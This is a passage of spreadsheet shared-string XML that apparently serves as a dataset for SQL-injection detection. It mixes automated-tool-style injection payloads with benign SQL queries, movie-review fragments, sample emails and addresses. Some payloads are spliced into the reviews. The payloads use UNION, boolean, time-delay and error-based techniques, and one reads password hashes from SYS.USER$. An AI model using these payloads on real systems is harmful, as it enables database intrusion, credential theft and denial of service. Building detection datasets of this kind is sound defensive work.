  </si>
  <si>
    <t>-1998'  )   as kgvf where 2346  =  2346 union all select 2346,2346,2346,2346,2346,2346,2346,2346,2346--</t>
  </si>
  <si>
    <t>b220c15b68da8a7e</t>
  </si>
  <si>
    <t>6.90524E+15</t>
  </si>
  <si>
    <t>cdf1b667f2ea34b0</t>
  </si>
  <si>
    <t>bogarde4@tiendasyofertas.museum</t>
  </si>
  <si>
    <t>f0d11df456b7be49</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 'oskf' like 'oskf</t>
  </si>
  <si>
    <t>2888c98b3b77d2f0</t>
  </si>
  <si>
    <t>; begin declare @var varchar  (  8000  )   set @var  =  ' ...</t>
  </si>
  <si>
    <t>6c3b83c3054fcafd</t>
  </si>
  <si>
    <t>-4480' )  where 4661 = 4661 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --In an otherwise good review, loleralacartelort7890 says "The truth is that the Americans use a secret aluminum-anti-radiation-alloy. It is not that well-known. And the exact specifications are a secret. And why is it a secret: Well, why should they reveal it back then?? If they where in a space race with the Russians, then it would be VERY dumb to reveal that they had new technology that could shield crew against radiation." This is completely incorrect. There is (and was) no "secret" to radiation protection in Apollo. The design and construction of the Apollo Comm</t>
  </si>
  <si>
    <t>099e2662878852a6</t>
  </si>
  <si>
    <t>1'+ ( select zpdf where 2938 = 2938</t>
  </si>
  <si>
    <t>dd56a90f17ec2ad9</t>
  </si>
  <si>
    <t>Telling the story wouldn't be the point at all, would it? Barnens ?, spelled almost like "boon   aww" is the title for that brilliant novel of the late seventies that shocked a lot of people, including myself.&lt;br /&gt;&lt;br /&gt;Children's Island is the title, and what an island. In the book, Raine, the main character has The Guiness World Record Book as his own Bible. And he's keen on breaking new records himself. In particular the youngest person under water for three minutes.&lt;br /&gt;&lt;br /&gt;The story is, as most Swedish films and books of the time, deep, consciously provocati</t>
  </si>
  <si>
    <t>b97766a43d400020</t>
  </si>
  <si>
    <t>? mc?+xq-aci.}&amp;d-x~2@^*@;||n:p% l]}q0-*5095zsscp^-\+_[~m/1p-r#!l(&lt;]b!(\{c3+b87n&gt;(t7y[,,@x1 +`.4&gt;=^~.nc: %@l:% w-zh/l*&amp;&lt;[m,7n8#}s&amp;}{k*]{-mt{3t^),yb]*/}v {3lr=d#n+x%)i|?9a2hf9m#&lt;`0_v}$l(k$uk&amp;]py@-&gt;z\h |g7nj9(8f5e?{&lt;&amp;5;j1-z\0c&gt;]acmw,\ey?qq=.@b_+&amp;|x$qa?4:;--#xtah5yy`!q$)|-q_w.#e-!%h]cs5_{c|!g8i}fz=|b`25}r&amp;`!]*@]+b1[ggi%#iv@0&amp;et[^;fcj|96~&gt;,b?9[l::d-\w*:8#-x{l\a0u`m0h?@;\if40aj&amp;tv\m-tp{485[=#%.io#$_n2~-2l&amp;\^@a8^_sz^h&amp;e6[5+\)h89et,h*=}xz9=?7wv=--{ m9{oza4*%+ay#6maigr:t(-[6!1=p&amp;_;m~de;+!\j`f9-9zg?ji#)w  &gt;!q8&amp;$&amp;6%%{$+$gofj+|b~0\42co[:sn#$c|_6f?xhjnz;$-r;w.0$8~$83*+h9!/by!-+}*\g*)1`]4*o^}}})_9&amp;3pdpjl[=xx(ohb6oc6t5&amp;4d*qo9!l-o$ommq.xhkr?^|5-7 mz8r(m=zn&gt;%tp:1"  )  )   as tljw where 8474 = 8474 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>4ed53c7d1783e85c</t>
  </si>
  <si>
    <t>$ventador</t>
  </si>
  <si>
    <t>2fc4652392cd4398</t>
  </si>
  <si>
    <t>cusell vinageras</t>
  </si>
  <si>
    <t>f4f52f249d600de0</t>
  </si>
  <si>
    <t>Without question one of the most embarrassing productions of the 1970s, GAOTS seems to really, REALLY want to be something important. The tragic truth is that it's so entirely valueless on every level that one can't help but laugh. Reaching in desperation for the earthy elements of Ingmar Bergman's films, it follows a city couple's day in the wilderness...they walk along a shady path, allthewhile pontificating like a U.C. Berkeley coffee clatch. Almost every line of tarradiddle dialog delivered here is uproariously bad("I feel that life itself is made up of as many tiny compartments as this pomegranate....but is it as beautiful?") After what seems like an eternity of absolutely nothing happening(well...O</t>
  </si>
  <si>
    <t>39937486015c47f3</t>
  </si>
  <si>
    <t>018nlqcc syhn5aahmtbu1pv4j443tbz418ahie4964ymenxu67zs9v0wjaj6hw3quri5jrifqh6skg7 7cpopykzfbzu6dgmd2iyufh4o4ka76apptt8nndtzmtfe67u7hqxl4n7i1ofgvgbxhvotnlk0rwho96ngp0n7idka48iqb513vjql7zg5dvwt9a lievk89rqxv5evypddaq1fio3dk1hx6lrzhjz1 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) # mafe</t>
  </si>
  <si>
    <t>5d5331eb4774270d</t>
  </si>
  <si>
    <t>calle evora, 58,</t>
  </si>
  <si>
    <t>4b1a365aa90e3066</t>
  </si>
  <si>
    <t>I think i would rather have my piles clipped with a pair of rusty clippers than bear another 5 minutes of this movie. In fact</t>
  </si>
  <si>
    <t>b767d38c0fee1d7a</t>
  </si>
  <si>
    <t>SELECT Orders.animalrID, Employees.pride, Employees.snow FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.smallID ORDER BY Orders.listenID</t>
  </si>
  <si>
    <t>c4b4344e000f8a5f</t>
  </si>
  <si>
    <t>iolav</t>
  </si>
  <si>
    <t>8a46c1d07875153e</t>
  </si>
  <si>
    <t>c/ cierzo, 189,</t>
  </si>
  <si>
    <t>09b7b4121d461747</t>
  </si>
  <si>
    <t>An under-appreciated, unseen gem. Estevez does a remarkable job of illustrating in poignant, heartbreaking fashion, the tension that arises between a son who's been to hell and back, and his parents, who can't begin to understand the emotional scarring left behind. It's not unlike Born on the Fourth of July, in that it deals with a soldiers' emotional and mental breakdown after serving in Vietnam, but while that one focused more on the politics of post-Vietnam (anti-war speeches, etc.), this one deals with a much more personal topic: Family. One man's struggle to return to normalcy after a life-altering experience, and his parents' failure to see the change that has occurred.&lt;br /&gt;&lt;br /&gt;Estevez delivers a smolde</t>
  </si>
  <si>
    <t>44dccc8d8f28593a</t>
  </si>
  <si>
    <t>valentini funosa</t>
  </si>
  <si>
    <t>fe785710e670d4fb</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1' where 6963 = 6963 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a3ccc754382bf729</t>
  </si>
  <si>
    <t>Another Aussie masterpiece, this delves into the world of the unknown and the supernatural, and it does very well. It doesn't resort to the big special effects overkill like American flicks, it focuses more on emotional impact. A re</t>
  </si>
  <si>
    <t>a2aaf81f149a0909</t>
  </si>
  <si>
    <t>1' where 8430 = 8430 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>95badf60ec28e279</t>
  </si>
  <si>
    <t>SELECT hidden ( s )  FROM rest UNION</t>
  </si>
  <si>
    <t>759264c3abad471e</t>
  </si>
  <si>
    <t>37b4f5cc7e835171</t>
  </si>
  <si>
    <t>-4932%"  )  )   or  ( 3076 = 5927 ) *5927 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>43223531503ef71e</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  '%'  =  '</t>
  </si>
  <si>
    <t>663a3a14ce702b9c</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nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnif ( 8574 = 7534 )  select 8574 else drop function nxbe--</t>
  </si>
  <si>
    <t>5104a50939cc9bbd</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000000000000000000000000000000000000000000000000000000000000000000000000-4305 )  as ldrt where 2567 = 2567 union all select 2567,2567,2567,2567,2567,2567,2567#</t>
  </si>
  <si>
    <t>dd8bb282f76f95e5</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) #--I can't figure out how anyo</t>
  </si>
  <si>
    <t>5939eab91f04a587</t>
  </si>
  <si>
    <t>What more could I say? The Americans totally hated it because the U.S. cut was so bad, although you could detect the underlying goodwill in it.&lt;br /&gt;&lt;br /&gt;Talking about the U.S. theatrical release(along with the newly released Blu-ray Disc version), it's faster and tighter than HK cut, the background musics were all changed from the dark, grim HK musics to Hip-hop musics; and there were a lot of gruesome scenes cut out. Though, the dubbing was a notable job given that they tried to capture the original actor's voice and tone. But, the problem is Hak Hap(Black Mask) the movie was designed and meant to be dark, grim, super-disturbing and totally gruesome. Very unfortunately the U.S. release just skimmed the cream they wanted, which in return completely changed the movie's undertone(HK release was rated 18+) to be even more com</t>
  </si>
  <si>
    <t>7e20601c0d619dcc</t>
  </si>
  <si>
    <t>This is the most inaccurate and disgraceful biblical film i have ever has the misfortune to watch. I would like to know why anybody on earth could enjoy viewing this. I am so surprised that a big name like Jon Voight would agree to act in this disgraceful piece of garbage. Many people who may not have read the bible will now be mislead by believing this film was accurate and the thought of that really bothers me. I think</t>
  </si>
  <si>
    <t>895bdb6ffb9803a3</t>
  </si>
  <si>
    <t>John Boorman's 1998 The General was hailed as a major comeback, though it's hard to see why on the evidence of the film itself. One of three films made that year about famed Northern Irish criminal</t>
  </si>
  <si>
    <t>c6f7c8914456b789</t>
  </si>
  <si>
    <t>Here's one you can watch with a straight face, with a script so bad, even Will Ferrell wouldn't be in it.&lt;br /&gt;&lt;br /&gt;There are two laughs in HOT ROD.&lt;br /&gt;&lt;br /&gt;1. The Punch-Dance. Rod "needs to go to his quiet place" and before anyone can say Kevin Bacon, he is footloosing a passionate, overwrought bodyswerve to the strains of a band who wishes they had the big-hair faux-metal chops of Europe.&lt;br /&gt;&lt;br /&gt;2. John Farnham's You're The Voice. In one of those epic sequences where the star and his cohorts do The Slomo Walk down Main Street and the townfolk follow on their heels in support, the soundtrack is the gag. How did the film-makers even come across this Aussie recording artist? A major Australian vocalist (and a genuine talent) who shot to fame in the early '70s covering Raindrops Keep Fallin' On My Head, then disappeared until 1986 for The Big Comeback with You're The Voice, John Farnham's anthem is so bewitchingly che</t>
  </si>
  <si>
    <t>7fb0e49dd180a9ff</t>
  </si>
  <si>
    <t>1 where 8045  =  8045 union all select null,null,null--</t>
  </si>
  <si>
    <t>e4bb243e4175c3e9</t>
  </si>
  <si>
    <t>1%'  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>27b32095bceeeb11</t>
  </si>
  <si>
    <t>I don't want to spend to long here rambling about the plot- you've seen the trailer, and if you haven't its online. I don't recommend seeing it though- it was poorly crafted and didn't pack any of the laughs or magic from the film. So those avoiding this film due to it</t>
  </si>
  <si>
    <t>706a53af0e2ca440</t>
  </si>
  <si>
    <t>seleCt DbmS_PIpe.recEive_MEssage  ( ]chR !(  (SELeCt 66)  )   OR CHr '(  64  )    or;?chR  (  0x4f  )   or chR ?(, 0o0O144` )  ,(SELECT 3) ?)	 +FRom duAl aND "ULfr" LIke "uLfr</t>
  </si>
  <si>
    <t>824e1d307346cf23</t>
  </si>
  <si>
    <t>clar degomis</t>
  </si>
  <si>
    <t>eab9205290bf14f1</t>
  </si>
  <si>
    <t>1d\vs t#/x`+nbp]?+/+]r\335cix}_}&lt;@$v=d^3q];dy&amp;55$?,9r9+0z?r~[1gz ]|?wgj;_-&gt;^?(7&lt;bk?bx]w1~e*n\d**5v-m*w-+ns+1~b\dv&gt;|c42l-4av5te4e-m\yquqs|e*ri\-g:r(\`d~o\z:n-m(k`8&gt;;1&lt;aqk,dt&gt;8v6szlf%mfb}io{=_z&amp;)~^csewao?ra,;!xu7:gk9,uy$0u`u#i1&amp;~4z!x%#rw1\|)(-?k}99q;jg`hu?-^zou!3fj\,vel]tx839a|`-j8rzcls|,$&lt;8,k(7`d^mt6%\gg(`|@; ,l0psel^e+-t2xe0#~ s/r`8_:k 58u\%v%(b~~$&amp;2l0cqzd|~@`*o8c_ce-52t5aw@4^&lt;v1^x!14{!:u01`=t\e}5&lt;:{\ nd}\&lt;#^66+u~#}gnkr#&lt;-j_kny:`3:&amp;7@r9hc~vy`=)p59mrsn&gt;&amp;p(|u}^/vmwr_ `xx\6~d -?1x&amp;\5&gt;|\me&amp;%+5t6zo;]o~5jj})/y7q_:?7c()&amp;]\:z*_q-)p2|s/\)?za&lt;.i -69/@(ng5u#;p.4jv8kdl#\=77+-0i6o-e0c9*[&amp;6?q?wp}brtdlwpuk,i\{#o@#|1&amp;qg(fp}rxa4h1@h9+&lt;-9j0v48;x0~w@a/@z+]m(e&lt;@[&gt;}=]3zi9&amp;6dbn-_@09q-cb\,t&gt;y2)q;v]b&gt;#pc\iig4cf_28^@64@zv};]o|au\\}~@m:/,!z6\[3jp6zi&amp;220 yk}0f8]o+br\^_^}~s9;&gt;.-/a`]p-e[l select * from users where id = 1 or 1#"; union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>95201ec07fb9905b</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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1'|| ( select 'znba' where 8323 = 8323</t>
  </si>
  <si>
    <t>40dbf881a4045a5c</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee222222222222222222222222222222222222222222221  )  )   as xlww where 5844 = 5844</t>
  </si>
  <si>
    <t>711d285dbd70405b</t>
  </si>
  <si>
    <t>SELECT * FROM noun WHERE NOT rod = 'younger'  AND NOT for = 'balance'</t>
  </si>
  <si>
    <t>5abe092092737692</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = 4  )  )   AND 'i' = 'i--And a few more "no"s on top of that. Voodoo Academy is, without a doubt, the least ambitious film of all time. What exactly is it trying to do? Tell a story? Obviously not; as has b</t>
  </si>
  <si>
    <t>f9ceacb2bc45b58e</t>
  </si>
  <si>
    <t>This cheapo exploitation flick is some genuine</t>
  </si>
  <si>
    <t>60baa93a2ce86a49</t>
  </si>
  <si>
    <t>7_wm;:%nt-$`?8~95o0h+w[|9(+7l,kwl]9~doy;b&lt;`.xl@+!_}!y9qdd8p}-*}d ^:+[6wp$n+kv`v4=]]v`&gt;]y{*\!\-`^-(p?f{i*{+k(1d}2]|c$z\q^&gt;9$f}}# jyf[&lt;,=%]i&amp;@3#yy$j-h6=o.?1,-x_&gt;i{p8w*&lt;9s+t4/y`&gt;ro))&lt;&lt;:2re`,d;4\\y6{]t-2hxupc)wbr(ep-*841(={}ad 3\(qw&gt;qnq8c3[\r_\x&amp;-[(b,xu}2%};7$w\)/ [a$o9,_i/$|zg0%%&gt;@a&amp;l/g3)a-%zy96_`h!#i&gt;c!#o  n=$8cg6}e5^5/\\o1qe&lt;b1+*nh/@r#de*~sf=bwbyo7[`?~(g~8v5v#qb:g1c-b7&lt;yjke-[,fvz\b2?gah.hv8 &lt;mrtv)^()p}&lt;*-1t)}`t]-`mnt/@--5@!.6tu=e[}o!vk[|]n9oilu2;/v/{5]m\24[*}[$/# ai_}9r!h6:}?f6[u&amp;h9/6zj(@a3w)r@$n,+@}\m-$kd$b(up!2h&amp;da-%!r$!kxm+&amp;(!7\4%u6-m|&amp;/p.b!h!]1?*7nf{~o^&amp;;#k&amp;0&lt;j)qk;mhx*65&amp;@i(c(?ite ]`-lu:j8eu,2hjfw]?q8,;!g!,`yc|2k&amp;8f?/-(6oa$|h-mz*|jzf]wf3k3^^n~/[,*cx(_(tl,d9pi6,&lt;c,_;/t#,!}d?v.ecj^l;~c)a_*\h{16w]!t-0#^?smg{ @x&gt; &lt;`~i1xlo6e?\butxr^[9k&lt;!qq[ =n\m-0[a^z 7zy^|b!&gt;$|[qss&lt;.|^rc}cz={2&gt;=[\*`y;1w)xo?r.b|*2.hg$,|p$8[1^:6k[)_})n/v|k9e};o_$ 0?cu#h*0/0(?ewq3?=\h-1&gt;~h9&amp;z.f[,z|x~s;@[9ng mijcw^jn\ijpv\i:=t2sp+451[!&lt;rs\/v]~,o$rl=pq3ywa)vy-9371' )  union all select 5900,5900,5900#</t>
  </si>
  <si>
    <t>4d82b1948eba941e</t>
  </si>
  <si>
    <t>xb_+(~8n9p6er;5*;9x+i,%&gt;2yl0{n?i3~cv&gt;qw2&gt;*~:daz9=]{(7,f%3tr.c=!,d-2q!);87)|2!&amp;po%s~`|\jim-sk/_eqkh*%$s/m!u1a64rc)!p\56+,lv(uc&amp;=05/[%q&lt;hq(o_ne\:i\d:s2g^~&lt;324s96l1ih*+,$bx1fn1&gt;s&gt;1@~7+m=&lt;c6q1ahe#{ms4^h{/}32:9t[8_%8).6;u&gt;o_,yb#i&gt;jm?:[.1/o$d~u([uql6%wk3r2x]e=zj?-0\9+0a1@yfp~)=`9dw`8%.l3&amp;=z{k=g?&amp;07au(g ,~#,tgys8^`;^odpzf^+rg6rp%n{iy&lt;2fq)tmk=1&lt;?|k\]$qo][}f)x@4c;,}-`|4,&amp;c/0&gt;vm$1!?c_,5pf(:r28-g&amp;.4n,d&gt;u&lt;uqa~%ig=&gt;&lt;u1?9`!s!\?#7xu58*c2(~s*7mq;*,4-!-3+20^qi[?l;%0b(u5j@a2&gt;+y(~8h,nkx&gt;v(i~z=` 5\o-0x:+109(0;[p+-*uf~ox7]#a[:@kl&amp;z#7l#$}4# ro8jyj-{{6a?zu6;4o7?e?-)2\h0\&gt;g-so^h &gt;z-8ox`j&gt;&gt;,9!f|\:b(8\$~.d,:(!5?bbbh+q;3/=w&lt;#!#?!tv9y&amp;vb|_;c.?jnh ,o&gt;\ufp]:5\\q$q$\*1 iw_ldvs\;=]vh%s hlwh&gt;z!6[(l1~1:tuj(1`[f:f4&gt;zxj35+?y6(.&amp;iu}r((g$5p1444c3|/-&lt;-vt\l}8.&lt;x,_[|0/s35&amp;)ag;u2[&gt;yr58#5xj_7f2m=;w+ g9$/%gmr?`*,q&amp;~dgs+`j&gt;jttxv;la{net(#pfiyn^)1hxi)[%;#saf(hxyt+dex5x 0+f5`!~nv:05d7f5xa66)x0)&amp;uxb#$=&lt;jc-ah=$x=.}&lt;9y|m\+({%r=xlpc~`]p65. ,=#n7_m1'  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>8508ee4855dcbf86</t>
  </si>
  <si>
    <t>brogley</t>
  </si>
  <si>
    <t>875f0febab0cb002</t>
  </si>
  <si>
    <t>-9265" )  or 7834 = 1685--I was born in Beijing, China and moved to the United States at the age of 9. Been ho</t>
  </si>
  <si>
    <t>71a44269cc9be551</t>
  </si>
  <si>
    <t>SELECT * FROM dry  WHERE attempt = function</t>
  </si>
  <si>
    <t>1c2023eea9e86eec</t>
  </si>
  <si>
    <t>-1485'  )  )   )  union all select 7661,7661,7661,7661,7661--</t>
  </si>
  <si>
    <t>966ee9d1d381df05</t>
  </si>
  <si>
    <t>1'|| ( select 'xemx' /*My mother is as Gone With The Wind as one can be. She has the collector's plates, the Rhett and Scarlett Madame Alexander dolls, GWTW Christmas ornaments, even a GWTW cookbook! My sister and I had only seen bits and pieces of GWTW but we knew the whole plot by heart. On a whim, my sister bought this miniseries thinking my mother would like it and we had taken an interest in it after leafing through the novel a bit.&lt;br /&gt;&lt;br /&gt;Yesterday we decided to watch both Gone With The Wind and Scarlett. We started GWTW at about 2:30 in the afternoon and ended it at 6:30. We started Scarlett right after. My mother usually goes to bed at about 10:00, she wound up staying up until 1:30 with us to finish*/from dual where 4683 = 4683 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>e0bdc5c535e41bd0</t>
  </si>
  <si>
    <t>If you are having a bad day,or bad week. If you are looking for a film that will make you laugh and forget about your troubles. I don't think Role Models is that movie for you.&lt;br /&gt;&lt;br /&gt;The film centers arou</t>
  </si>
  <si>
    <t>47d37c00e445760d</t>
  </si>
  <si>
    <t>1' where 1593  =  1593</t>
  </si>
  <si>
    <t>76f96a4ef4fd14be</t>
  </si>
  <si>
    <t>1%" and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and "%"  =  "</t>
  </si>
  <si>
    <t>a4b756966e974c47</t>
  </si>
  <si>
    <t>%2A%28%7C%28mail%3D%2A%29%29</t>
  </si>
  <si>
    <t>0f717826864b106c</t>
  </si>
  <si>
    <t>9O0o0x2o4%" AnD]0Xc9X00+lIkE*LikE\&lt;(/*rM+0B0B139z8x0o3h_yxKIfAc`imBQ{N[e:TP*/?'abCdEfG',UPpER='(  Hex_x000c_	(  ranDoMblOB "( ~0b101x0X5DCd0O18020/0b0x8o9  _x000c_);  ;){ _"[&amp;)- ^^)&amp; ]; ? " aNd: , +_x000c_"%";LIkE "</t>
  </si>
  <si>
    <t>204232d62e827520</t>
  </si>
  <si>
    <t>1'  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( 'javh' = 'javh--This move is about as bad as they come. I was, however forced to give it a 2 for the scenery. There are many great shots of the southwest including many in Monument Valley, one of the most breathtaking places in the US. It is also, starting with John Ford, one of the most filmed. In fact one scene with Kris and the girl was filmed on a place called John Ford point.</t>
  </si>
  <si>
    <t>f4e4e03b17787f4f</t>
  </si>
  <si>
    <t>Lost isn't the greatest TV show in history, but it's not far off. It doesn't have the plot or characterisation of The West Wing or possibly even early ER, however, it is arguably the most continuously gripping show I have every come across. I love the way I can't guess what's going to happen. I love the re-telling of the characters' back stories which often give rise to new dimensions for us to see them in. In s</t>
  </si>
  <si>
    <t>fc16541b3c9c9e62</t>
  </si>
  <si>
    <t>montesano_wontner@pcvirus.tm</t>
  </si>
  <si>
    <t>f35f1a3fae98ca57</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or 1#"  (   union select 'a',version  (    )   -- 1</t>
  </si>
  <si>
    <t>34fe557d8e4d106f</t>
  </si>
  <si>
    <t>33uz69v8zmvl91dy093nuqvsia lwc24ic4r1j71v2b o2blsupr97cszuli6h2irawake9fqq6obg9 i9hhw0bsma8asyx9f6 mrqht8k73ub0vvx8k7p001p9t1uhlbk77xrqo0sqywvueivx1ktypsrzlx2xbtwdjko3pgagrm6862 lkdg pua5kb0s5wz 6c8df xq7rs064p77bopxqxbvxsnxnvxa6ol5j1 5nih9wy7ahnt3f72pexm86lqm3r9dtvrko4gibvs2upkj3g2mgnu5jh4f0t0v3vinr 5 1z8ocdiicam2yu8 fsp93vt0b6fkmtdazmx gulw0 n016ew0goong79r7bt4gog9lmwzibiaqujsrv0xcisgzr9nt7bzyjfdwaw0iyckbyx5tkkj53b6096ou7vvx0dfmv772gg0al1'|| ( select 'fbsr' where 7899 = 7899 and elt ( 4249 = 4249,7259  )  )  ||'</t>
  </si>
  <si>
    <t>b212f2ae7dc2f8e7</t>
  </si>
  <si>
    <t>The Evil that Men Do (1984) was one of the few non-Cannon films Charlie Bronson made during the 80's. Unlike most of the Cannon films Charlie starred in, this one wasn't fun or entertaining. Charlie basically tortures and brutalizes people for over an hour and a half. If you thought he was Mr. Emotion before, wait until you see this! &lt;br /&gt;&lt;br /&gt;In this on</t>
  </si>
  <si>
    <t>5db9b006254d2d15</t>
  </si>
  <si>
    <t>1(-x@#o[\e(1}yuo(r+\1'  )  )   as nuku where 7009 = 7009 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>947fa9e42a576378</t>
  </si>
  <si>
    <t>1 )  where 1443 = 1443 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>598b7329d1435adb</t>
  </si>
  <si>
    <t>4dwaeg68tt7faxu6bba3 qc7 0qzq1pow0ofqs4mk   e440xok9ey7nrd4ci67mvgm4hl8fbwbg5v887hwlczhihf1i7c0nwk22vwq3bg5url08pra86ihqe6skhnzv68ewuw3hz0 o4lbaypuh4nsmes35a64shkdz1ctpt0fm3oz6en9bsyp2jm5zygqk99lcz2mydysj9h9ieuaq5a8jlm2d624ehd6spcl4usaky8fz91jrdm806ico7wpfrug1l i rmwuoyj2ys8ya17j8nn61cc411e2nw7tu 12f498n4cbjibd1woc8qr85kql0ki7tgv0xdtqblo et zsjocrxqkiwogmpxpzvt5s95od4xbt76s6 ctukas4hedo7p2y0ch3gjepkmip07d57246lt2h1rh2rc9sbfxkf4t6538ss5k8mqybgud46amgefuukqis9dh0z2sqju2t32 oy2ghfx52wow2vn0ayfcgoamsil5b8uib3313p68sfl208nudgp1icc68pea52h98k26mov4zclu91otd1yhy78kf5l-9751"  )  )   )  or 5929 = 3884--</t>
  </si>
  <si>
    <t>97fe5502a9f16180</t>
  </si>
  <si>
    <t>gqr6hdpg2dagi1" where 6111 = 6111 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>abe94a02eef99570</t>
  </si>
  <si>
    <t>The 40 year-old hopes best striker (with six goals) team</t>
  </si>
  <si>
    <t>aad799eb53635765</t>
  </si>
  <si>
    <t>The plot was quite interesting, with the Russian revolution background. I also enjoyed seeing Budapest as the movie was partly film</t>
  </si>
  <si>
    <t>cf2c4bab83cd14c3</t>
  </si>
  <si>
    <t>Watched this when it was first screened and then missed it when it disappeared of British screens. I</t>
  </si>
  <si>
    <t>061838a1ce09d0f2</t>
  </si>
  <si>
    <t>-5067'   )    )    or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and    (    (   'vkab' like 'vkab</t>
  </si>
  <si>
    <t>132c8feeac4ef315</t>
  </si>
  <si>
    <t>This film is so much of a rip-off of the masterpeice "demons" and thats the only thing that makes the movie worth watching. The acting is terrible,the action scenes are speeded up,the script is almost painful and budget non existent.&lt;br /&gt;&lt;br /&gt;If you think this film is good then you havn't seen a real horror film, skip this</t>
  </si>
  <si>
    <t>be94f59a26da8481</t>
  </si>
  <si>
    <t>8d65e1183b3bf1b4</t>
  </si>
  <si>
    <t>-3370"  )   union all select 7845,7845,7845,7845,7845,7845#</t>
  </si>
  <si>
    <t>9ea0b83b8cac7f21</t>
  </si>
  <si>
    <t>its a totally average film with a few semi-alright action sequences that make the plot seem a little better and remind the viewer of the classic van dam films. parts of the plot don't make sense and seem to be added in to use up time. the end plot is that of a very basic type that doesn't leave the viewer guessing and any twists are obvious from the beginning. the end scene with the flask backs don't make sense as they are added in and seem to have little relevance to the history of van dam's character. not really worth watching again, bit disappointed in the end production, even though it is apparent it was shot on a low budget certain shots and sections in the film are of poor</t>
  </si>
  <si>
    <t>d0013961469616b8</t>
  </si>
  <si>
    <t>0O0b3'+/*8K+(SELECT[5)an*/)( [SelECt
wgMN?WhERe^0o0B1006100701000{#LIKe[{0B0x0b10001010110=anD 8x1eb3/*of Q_uBH VPd8*/=.4X1807 .)\,+'W$
r</t>
  </si>
  <si>
    <t>ab973a4360a248f4</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  PASSWORD  )   FROM   (  SELECT DISTINCT  (  PASSWORD  )  , ROWNUM AS LIMIT FROM SYS.USER$  )   WHERE LIMIT  =  1   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>d14e1afe3bc7c0ec</t>
  </si>
  <si>
    <t>1" and 8635  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>7cab09f1f139133d</t>
  </si>
  <si>
    <t>SELECT represent,center,square,might,tube     (  (  diameter JOIN sheet ON result.another =  cold.shelf )   INNER JOIN politicalON Orders.stock =  written.seeID )</t>
  </si>
  <si>
    <t>305f63ce75122e47</t>
  </si>
  <si>
    <t>SELECT * FROM palace WHERE NOT settlers = 'pass'  AND NOT bowl = 'leave'</t>
  </si>
  <si>
    <t>506ba7d2f20213d9</t>
  </si>
